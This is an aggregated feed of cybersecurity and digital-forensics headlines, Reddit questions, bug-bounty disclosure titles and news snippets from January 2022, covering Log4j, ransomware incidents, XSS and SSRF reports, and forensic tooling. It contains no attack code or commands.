    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? ​ I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. ​ USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
    While investigating a remote intrusion warning I noticed http traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic are to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    自动化渗透-DeepExploit框架深度分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Simple CTF- TryHackme
    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. in this Write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, Today i want to notice 4 ways to find xss in file upload that i found all of them in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK , mình sẽ từ từ dịch hết tất cả các method , các bạn có thể có thể xem bản gốc ở đây : “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )
  • Open

    关于漏洞检测适用命令的思考
    通常会遇到需要发包,去观察返回结果。通过返回结果去判断命令是否执行。那么那种命令执行的效果最佳?  ( 1 min )
    FreeBuf早报 | 印尼央行遭勒索攻击13GB数据外泄;推特安全团队大动荡前高管离职
    推特安全部门的负责人皮特·扎特科已离开公司,他曾是安全领域的著名黑客“Mudge”。首席信息安全官林基·塞西将在未来几周内离职。  ( 1 min )
    Cisco StarOS漏洞或有远程代码执行和信息泄露风险
    日前,思科公司(Cisco)宣布修补了一项远程代码执行漏洞。
    FreeBuf 甲方私享会·上海金融之夜活动圆满举行
    1 月 15 日下午,由中国网络安全行业门户 FreeBuf 发起的首场「甲方私享会·上海金融之夜」活动在上海顺利举行。
    FreeBuf周报 | 知名字幕站 Opensubtitles 遭黑客入侵;中国首个网络安全行业服务短号开通
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    ASRC 2021年电子邮件安全趋势回顾
    后疫情时代,大家也都慢慢开始适应远程办公,信息安全设备的部署不再只是慌乱应对远程工作所带来的安全隐患,而是全新型态的适应性部署  ( 1 min )
    2021年针对性勒索攻击活动年度报告
    索软件攻击已经是网络安全的最大威胁之一,已从早期网络滋扰发展成为如今危害社会运作、经济稳定和公共安全并不断升级的全球新挑战。  ( 1 min )
    盖棺事已:REvil勒索组织落网
    14日俄罗斯当局公布对勒索组织REvil实施抓捕  ( 1 min )
    2021网安法规大盘点:重磅法规持续落地,数据安全迎新机遇
    总的来说,2021年是数字经济腾飞之年,也是网络安全全面深入发展之年,更是数据领域全面深入监管之年。  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业假期网络安全
    春节将至,对于企业安全而言是一次不小的考验,作为年前最后一期话题讨论,想让大家聊聊如何保障假日期间企业的网络安全。  ( 1 min )
    2021 SCTF Flying-kernel题目分析
    这道题可以通过多种方式提权获得flag。这篇文章的解法更偏向于Glibc那套利用方式,内核任意地址写,并不是预期解,但是衍生出了更多的利用思路,有兴趣的可以自行调试。  ( 3 min )
    FreeBuf 网安大事记 | 2021年度漏洞利用事件汇总
    让我们回眸,盘点在2021年引发行业、乃至整个社会影响的30起漏洞利用事件。  ( 1 min )
    《信息安全技术 网络安全服务成本度量指南》(征求意见稿)发布
    《指南》适用于网络安全服务供需双方开展网络安全服务成本预算、项目招投标、项目决算以及相关合同编制等活动。
  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )

  • Open

    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999
  • Open

    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that setup Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terra bytes)? The next challenge is when doing the automated analysis (I'm using Autopsy), is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector) EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using the open source tool is preferred. However, I also open for any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )
  • Open

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Coletando parâmetros com o BURP SUITE!
    A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB ÇÖZÜMLERİ
    Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )
  • Open

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I've moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day, I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to a 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction) API for instantiating/provisioning and starting/stopping the boxes, executing scripts Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite Central to Eastern European area preferred Only whitehat tests with full permission, reputable business Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target) Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! ​ Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own python malware to test some free anti-virus solutions and software. For the dissertation/thesis i need to find some samples of RAT malware written in python to analyse , I have managed to find a couple but ideally I need a good website/resource that has a database off them. Any help would be great , many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
    Hi, an interesting security incident occured at my home and I would greatly appreciate advice on how to proceed. Few days ago, my HBO service was blocked in all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting and after few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occuring from my IP that was reported in public database. After some googling I found out that this must be the https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in details and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been jr pentester for few months and was wondering right before you get green light to pentest an web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was build. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get in trouble neither me or the company. Where do you draw the line which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing do you use any proxies or other stuff? How do you basically stay safe(keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
  • Open

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect Powershell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a staticly linked programming language which can be easily crossed compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: ​ https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]
  • Open

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Realizando OSINT con Google LENS
    Hoy les traigo a ustedes un nuevo articulo, donde decidí abordar una temática en especial, haciendo aprovechamiento de una de mis mayores… Continue reading on Medium »  ( 4 min )
    GEOINT y SOCMINT en la Investigación
    Hace unos días leí un artículo del Sr. Diaz Caneja, donde el autor destaca muy bien los alcances del social media intelligence y los… Continue reading on Medium »  ( 3 min )
    Los nuevos paradigmas de la Investigación: CRIMINT y Social media analitycs ante la digitalización
    Para comenzar a hablar sobre estos nuevos paradigmas, primero debemos entender dichas terminologías con el fin de ser mas amena nuestra… Continue reading on Medium »  ( 4 min )
    “YOU” una serie que nos muestra la vulnerabilidad de nuestra información en las Redes Sociales
    Netflix largo una nueva serie donde nos deja ver la importancia de nuestros datos, en dicha historia un joven se obsesiona con una mujer y… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challange 1
    On December 29, 2021, Quiztime (contributor @ twone2) shared a new OSINT quiz with us. The objective was, for me at least not very simple… Continue reading on Medium »  ( 2 min )
  • Open

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: seperated workspaces!
    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-20 Review
    浅析现代企业网络安全架构 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30007470 Points: 10 # Comments: 0  ( 2 min )
  • Open

    攻击者用成人游戏做诱饵,通过网盘传播恶意软件
    近日,安全研究人员发现 DDoS IRC Bot 恶意样本正伪装成成人游戏通过网盘进行传播。  ( 1 min )
    攻击者开始使用 XLL 文件进行攻击
    近期,研究人员发现使用恶意 Microsoft Excel 加载项(XLL)文件发起攻击的行动有所增加。  ( 1 min )
    2027年网络安全沙盒市场规模将达到430亿美元
    中国网络安全沙盒市场规模到2027 年预计达到 69 亿美元的市场规模。  ( 1 min )
    《信息安全技术 网络安全从业人员能力基本要求》(征求意见稿)发布
    《基本要求》规定了网络安全从业人员分类和各类从业人员具备的知识和技能要求,适用于各类组织对网络安全从业人员的选拔、培养、评价、管理等。
    营销巨头RRD承认在Conti勒索软件攻击中数据被盗
    美国营销巨头RR Donnelly(RRD)公司日前透露,该公司在一次12月的网络攻击中被窃取了数据。事后经BleepingComputer证实,这是一次Conti勒索软件攻击。RRD是一家头部的综合服务公司,为企业客户提供通信、商业印刷和营销服务。公司在全球200多个地点拥有超33,000名员工,其2021年的收入为49.3亿美元。2011年12月27日,RRD公司向美国证券交易委员会(SEC)
    九部门联合发布《关于推动平台经济规范健康持续发展的若干意见》
    《意见》从健全完善规则制度、提升监管能力和水平、优化发展环境、增强创新发展能力、赋能经济转型发展、保障措施等方面提出了十九条措施。
    红十字国际委员会遭受网络攻击,超 51.5 万人的数据发生泄露
    红十字国际委员会披露其数据承包商遭受网络攻击,导致“家庭团聚”项目信息泄露,超过 51.5 万民众个人数据被盗。  ( 1 min )
    FreeBuf早报 | 美国特工利用WhatsApp监视中国手机;中国首个网安行业服务短号开通
    根据俄亥俄州刚刚申请解封的政府监控显示,2021 年 11 月,美国缉毒署的调查人员要求WhatsApp跟踪 7 名位于中国的用户。。  ( 1 min )
    CACTER邮件安全&中睿天下发布2021年Q4企业邮箱安全报告:重点关注,钓鱼邮件翻倍,85%来自境外!
    CACTER邮件安全联合中睿天下发布邮件安全报告! ️钓鱼邮件同比翻倍增长!来源85%居然来自境外? 年关将至,提高防范,刻不容缓  ( 1 min )
    基于商密SM9算法的物联网安全平台设计与应用
    如何解决物联网的安全,成为摆在政府监管和各类企业面前的一道难题。因此,推行完整、科学、规范化的物联网安全平台已成当务之急。  ( 1 min )
    90分的机房长什么样?(一)
    接上篇《90分的机房长什么样?(一)》内容,本篇继续为大家讲解机房设备中的另外三方面测评标准。  ( 1 min )
    任子行视频网解决方案,专注视频监控数据安全防护!
    有网友爆料称,在B站上还能看到疑似专门破解学校、医院等公共场所监控视频并上传的账号,并可以通过相关的账号看到有用户上传的多段教师讲课、医院护士台以及酒店前台的监控视频。
    剖析NX开启状态下ROP的构造
    在学习pwn的过程中,我们通常会碰到开启NX的情况,也就是堆栈不可执行,在这种情况下,我们要利用栈内的未被清空的内容或者例如init这种函数,来进行构造rop,进一步编写exp拿到shell。  ( 1 min )
    营销巨头数据被盗、国际红十字会遭遇网络攻击|1月20日全球网络安全热点
    FBI警告:骗子正在使用假二维码窃取您的密码和金钱。  ( 1 min )
    网络钓鱼者正冒充美国劳工部骗取用户Office 365账号
    该钓鱼活动已经持续了至少几个月,邮件发件人假装是DoL的高级员工,邀请收件人为正在进行的政府项目提交投标。
    FreeBuf网安大事记 | 2021年度国内网安事件汇总
    国内网络环境一直处于“水深火热”中,网络世界对抗的趋势越来越明显,受到别国的网络攻击频率不断增加。  ( 1 min )
  • Open

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t read yet Part-1 and Part-2, you may take a look at them first. Or we can… Continue reading on Medium »  ( 7 min )
  • Open

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ Comments URL: https://news.ycombinator.com/item?id=30003308 Points: 2 # Comments: 0  ( 6 min )
  • Open

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell [link] [comments]
    Kraken the Code on Prometheus
    submitted by /u/dmchell [link] [comments]
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell [link] [comments]
    The OAuth Misconfiguration
    submitted by /u/banginpadr [link] [comments]
  • Open

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles [link] [comments]  ( 1 min )
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing. (until I convince my friend Andy to let me session/ tour with his band.) submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910
  • Open

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTF's & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best, we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371 [link] [comments]  ( 1 min )
  • Open

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What's some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick google search hasn’t bore anything useful. Preferably a professional paper submitted by /u/strollingginger [link] [comments]  ( 1 min )
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23 [link] [comments]  ( 2 min )
  • Open

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (saas) where we're about to reach our second product milestone soon - MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or it's more realistic to wait until our product and team gains more maturity? If we have to pick, e.g. due to budget constraints, would you recommend to pursue ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto [link] [comments]  ( 3 min )
    Trend micro Apex One vs Deep Security/Cloud one
    Hi all, Is ApexOne good for Servers and Endpoints both? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both the products of trend micro, but am not able to find understandable differences between both, need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome [link] [comments]  ( 1 min )
    Hacking books(python) for intermediate programmers
